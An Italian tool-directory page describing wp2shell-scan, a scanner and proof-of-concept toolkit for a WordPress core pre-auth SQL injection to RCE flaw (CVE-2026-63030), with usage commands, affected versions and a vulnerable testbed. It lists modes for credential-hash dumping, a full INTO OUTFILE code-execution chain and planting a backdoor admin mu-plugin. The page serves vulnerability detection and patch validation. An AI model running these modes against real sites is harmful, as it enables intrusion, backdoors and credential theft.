Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
wp2shell-scan — Uno scanner e toolkit proof-of-concept per CVE-2026-63030 (wp2shell) - esecuzione remota di codice pre-autenticata nel core di WordPress | Kitploit
Strumenti/GitHubGitHub/fullhunt/wp2shell-scan
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubfullhunt/wp2shell-scan

wp2shell-scan

Uno scanner e toolkit proof-of-concept per CVE-2026-63030 (wp2shell) - esecuzione remota di codice pre-autenticata nel core di WordPress

Vedi Repository
521 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

wp2shell-scan

Uno scanner e toolkit proof-of-concept per CVE-2026-63030 (wp2shell), una vulnerabilità di esecuzione remota di codice pre-autenticata nel core di WordPress

Caratteristiche

  • Due metodi di rilevamento non distruttivi: --check-type time-based (timing SLEEP) e --check-type error-based (differenziale TRUE/FALSE/broken). Entrambi sicuri per scansioni su vasta scala.
  • Supporto per elenchi di URL e più target in una singola esecuzione.
  • L'estrazione tramite oracolo booleano basato sul contenuto funziona senza SLEEP, output di errori o privilegi FILE MySQL.
  • Fallback di estrazione blind basata sul timing per oracoli booleani inaffidabili.
  • Sondaggio degli endpoint REST per individuare quali route propagano l'iniezione fino a WP_Query.
  • Validazione completa della catena di exploit (SQLi → INTO OUTFILE → esecuzione PHP), protetta da un flag esplicito --i-have-authorization.
  • Testbed vulnerabile locale (Docker) per la riproduzione sicura offline.

🚨 Annuncio (Luglio 2026)

CVE-2026-63030 ("wp2shell") è una vulnerabilità di esecuzione remota di codice pre-autenticata nel core di WordPress. Un bug di confusione delle route / desincronizzazione degli indici nell'endpoint batch dell'API REST (/batch/v1) consente a un attaccante non autenticato di introdurre un valore author_exclude non sanificato in WP_Query, causando un'iniezione SQL. Nei casi in cui l'utente del database dispone del privilegio FILE, ciò porta all'esecuzione remota di codice tramite SELECT ... INTO OUTFILE. Non sono richiesti plugin. È interessata un'installazione WordPress standard.

WordPress ha rilasciato correzioni in 6.9.5, 7.0.2 e 7.1-beta2. Applicate la patch immediatamente. Se avete bisogno di aiuto per scansionare o individuare questa vulnerabilità nella vostra infrastruttura, scrivete a [email protected]. Per maggiori informazioni, consultate il blog di fullhunt.io.


Descrizione

Abbiamo studiato wp2shell (CVE-2026-63030) sin dalla sua divulgazione pubblica e abbiamo collaborato con i nostri clienti per prevenire questa vulnerabilità. Rilasciamo come open source uno strumento di rilevamento e scansione per individuare e validare CVE-2026-63030. I team di sicurezza potranno usarlo per scansionare le proprie infrastrutture alla ricerca di wp2shell e per verificare che le regole WAF e le patch blocchino effettivamente la catena di attacco nell'ambiente dell'organizzazione.

wp2shell-scan.py è uno scanner unico e unificato che supporta otto modalità:

Nota: Le modalità contrassegnate con "Sì" nella colonna Autorizzazione richiedono il flag --i-have-authorization.

Utilizzo

root@kitploit:~
$ python3 wp2shell-scan.py -h
usage: wp2shell-scan.py [-h] [-u URL] [-l USEDLIST] [-p PROXY]
                        [--check-type {time-based,error-based}] [-k]
                        [--timeout TIMEOUT] [--sleep SLEEP]
                        [--endpoint ENDPOINT] [--webroot PATH[,PATH...]]
                        [--out-name OUT_NAME] [--php-code PHP_CODE]
                        [--user-login USER_LOGIN] [--user-pass USER_PASS]
                        [--user-email USER_EMAIL] [--i-have-authorization]
                        [--sql LABEL:SQL] [--query QUERY] [--dump [KEY ...]]
                        [--all] [-v]
                        {check,probe-endpoints,probe,extract,blind,exploit,adduser,get-users}

CVE-2026-63030 (wp2shell) scanner: time-based / error-based checks, Boolean and blind extraction, authorized exploit validation.

positional arguments:
  {check,probe-endpoints,probe,extract,blind,exploit,adduser,get-users}
                        Scan mode.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Check a single URL.
  -l USEDLIST, --list USEDLIST
                        Check a list of URLs.
  -p PROXY, --proxy PROXY
                        Send requests through proxy.
  --check-type {time-based,error-based}
                        Detection method for check mode - [Default: time-based].
  -k, --insecure        Disable TLS certificate verification.
  --timeout TIMEOUT     HTTP timeout (in seconds) - [Default: 15].
  --sleep SLEEP         SLEEP seconds for time-based checks and blind mode - [Default: 5].
  --endpoint ENDPOINT   REST endpoint used for the injection - [Default: /wp/v2/categories].
  --webroot PATH[,PATH...]
                        Server webroot for OUTFILE writes; repeatable - [Default: /var/www/html].
  --out-name OUT_NAME   Dropped filename - [Default: random].
  --php-code PHP_CODE   PHP written as the OUTFILE row terminator - [Default: '<?php phpinfo(); ?>'].
  --user-login USER_LOGIN
                        Backdoor username for adduser mode - [Default: wpadmin].
  --user-pass USER_PASS
                        Backdoor password for adduser mode.
  --user-email USER_EMAIL
                        Backdoor email for adduser mode.
  --i-have-authorization
                        Required for exploit, adduser, get-users, extract, and blind modes.
  --sql LABEL:SQL       probe mode: repeatable label:sql payload pair.
  --query QUERY         extract/blind mode: custom SQL scalar query to extract.
  --dump [KEY ...]      extract mode: prebuilt query keys (comma or space separated); empty=user+db+version.
  --all                 extract mode: dump all prebuilt queries.
  -v, --verbose

Check time-based (sonda di timing SLEEP non distruttiva)

root@kitploit:~
$ python3 wp2shell-scan.py check -u https://wp.lab.local --check-type time-based

Check error-based (differenziale non distruttivo TRUE / FALSE / broken)

root@kitploit:~
$ python3 wp2shell-scan.py check -u https://wp.lab.local --check-type error-based

Scansione di un elenco di URL

root@kitploit:~
$ python3 wp2shell-scan.py check -l urls.txt

Individua quali endpoint REST sono iniettabili

root@kitploit:~
$ python3 wp2shell-scan.py probe-endpoints -u https://wp.lab.local

Estrazione di dati tramite oracolo booleano (nessun privilegio FILE richiesto)

root@kitploit:~
$ python3 wp2shell-scan.py extract -u https://wp.lab.local --i-have-authorization --dump user,database,version

Validazione completa della catena RCE (solo target autorizzati)

root@kitploit:~
$ python3 wp2shell-scan.py exploit -u https://wp.lab.local --i-have-authorization

Installazione

root@kitploit:~
$ pip3 install -r requirements.txt

Supporto Docker

root@kitploit:~
git clone https://github.com/fullhunt/wp2shell-scan.git
cd wp2shell-scan
sudo docker build -t wp2shell-scan .
sudo docker run -it --rm wp2shell-scan check -u https://wp.lab.local

Testbed locale

È incluso un ambiente WordPress 7.0.1 + MariaDB vulnerabile di proposito (con privilegio FILE concesso) per la riproduzione sicura offline:

root@kitploit:~
$ cd testbed
$ docker compose up -d
# Complete the WordPress setup wizard at http://localhost:8080, then:
$ python3 wp2shell-scan.py check -u http://localhost:8080

Informazioni su FullHunt

FullHunt è la piattaforma di gestione della superficie d'attacco di nuova generazione. FullHunt consente alle aziende di scoprire tutte le loro superfici d'attacco, monitorarne l'esposizione e scansionarle continuamente alla ricerca delle ultime vulnerabilità di sicurezza. Tutto in un'unica piattaforma, e non solo.

FullHunt offre una piattaforma enterprise per le organizzazioni. La FullHunt Enterprise Platform fornisce scansioni estese e funzionalità aggiuntive per i clienti. La piattaforma enterprise di FullHunt consente alle organizzazioni di monitorare da vicino la propria superficie d'attacco esterna e di ricevere avvisi dettagliati su ogni singolo cambiamento. Organizzazioni in tutto il mondo usano la FullHunt Enterprise Platform per risolvere le proprie sfide di sicurezza continua e di sicurezza della superficie d'attacco esterna.

Disclaimer legale

Questo progetto è realizzato esclusivamente a scopo educativo e di test etico. L'utilizzo di wp2shell-scan per attaccare target senza previo consenso reciproco è illegale. È responsabilità dell'utente finale rispettare tutte le leggi locali, statali e federali applicabili. Gli sviluppatori non si assumono alcuna responsabilità e non sono responsabili di eventuali usi impropri o danni causati da questo programma.

Licenza

Il progetto è concesso in licenza MIT.

Autore

Mazin Ahmed

  • Email: mazin at FullHunt.io
  • FullHunt: https://fullhunt.io
  • Website: https://mazinahmed.net
  • Twitter: https://twitter.com/mazen160
  • Linkedin: http://linkedin.com/in/infosecmazinahmed
Scarica lo strumento
Versione
Vulnerabile
Corretto
6.96.9.0–6.9.46.9.5
7.07.0.0–7.0.17.0.2
7.17.1-beta17.1-beta2
< 6.9Non interessato (endpoint batch non presente)—
ModalitàScopoAutorizzazione
checkRilevamento non distruttivo. Due tipi di check: --check-type time-based (sonda di timing SLEEP) oppure --check-type error-based (differenziale TRUE/FALSE/broken).No
probe-endpointsScopre quali endpoint REST propagano l'iniezione fino a WP_Query.No
probeDifferenza affiancata delle risposte di N payload SQL.No
extractEstrazione tramite oracolo booleano di metadati DB e hash.Sì
blindEstrazione blind basata sul timing (fallback quando l'oracolo booleano non è affidabile).Sì
exploitValida l'intera catena SQLi → INTO OUTFILE → esecuzione PHP.Sì
adduserScrive un backdoor mu-plugin che crea un account amministratore; ripiega sull'estrazione booleana degli hash.Sì
get-usersDump tramite oracolo booleano di tutte le credenziali wp_users.Sì